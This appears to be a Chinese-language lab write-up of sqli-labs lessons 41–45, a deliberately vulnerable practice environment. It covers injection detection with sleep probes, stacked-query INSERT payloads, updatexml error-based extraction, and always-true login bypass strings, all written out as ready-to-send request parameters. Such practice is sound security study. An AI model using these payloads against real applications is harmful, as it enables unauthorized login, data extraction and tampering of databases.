sqli-labs lesson41-45
lesson-41 宽字节注入
判断注入:
?id=1 and sleep(3)插入数据:
?id=1;insert into users (username,password) values ('44','55');或union select注入:
-1 union select 1,2,database()
2.lesson-42 宽字节注入
判断注入:
单引号注入
在username除无注入,被 mysqli_real_escape_string函数过滤了
插入数据:
login_user=admin&login_password=555';insert into users (username,password) values ('55','44');-- +&mysubmit=Login或报错注入:
login_user=admin&login_password=555' or updatexml(1,concat(0x7e,(select database()),0x7e),1)-- +&mysubmit=Login
3.lesson-43 宽字节注入
判断注入:
单引号括号注入
插入数据:
login_user=adn&login_password=555');insert into users (username,password) values ('555','444');-- +&mysubmit=Login或报错注入
login_user=a&login_password=aaa') or updatexml(1,concat(0x7e,(select database()),0x7e),1)-- +&mysubmit=Login
4.lesson-44 宽字节注入
判断注入
为单引号注入
没有报错,不可用盲注判断闭合符号,因为是登录时,查用户名和密码,都是不对的,and sleep(3),就不行了
login_user=aaaa&login_password=aa' or '1'='1&mysubmit=Login闭合为什么不能用-- +,#,因为查的是登录的用户名和密码,是没有这一条数据的,看不出来是否登录成功
闭合还可以用or 1=1#
用or ' ,and '1'='1,and '都不行,or ' 和查询时的用户名和密码都是假的,所以没数据,and '和and '1'='1一样
插入数据:
login_user=aaaa&login_password=aa' ;insert into users (username,password) values ('55a5','4a44'); or '1'='1&mysubmit=Login盲注用不了,因为后面的 or '1'='1,闭合后为恒真
5.lesson-45 宽字节注入
判断注入:
单引号加括号
login_user=aaaa&login_password=aa') or ('1')=('1&mysubmit=Login插入数据:
login_user=aaaa&login_password=aa') ;insert into users (username,password) values ('55a5','4a44'); or ('1')=('1&mysubmit=Login
浙公网安备 33010602011771号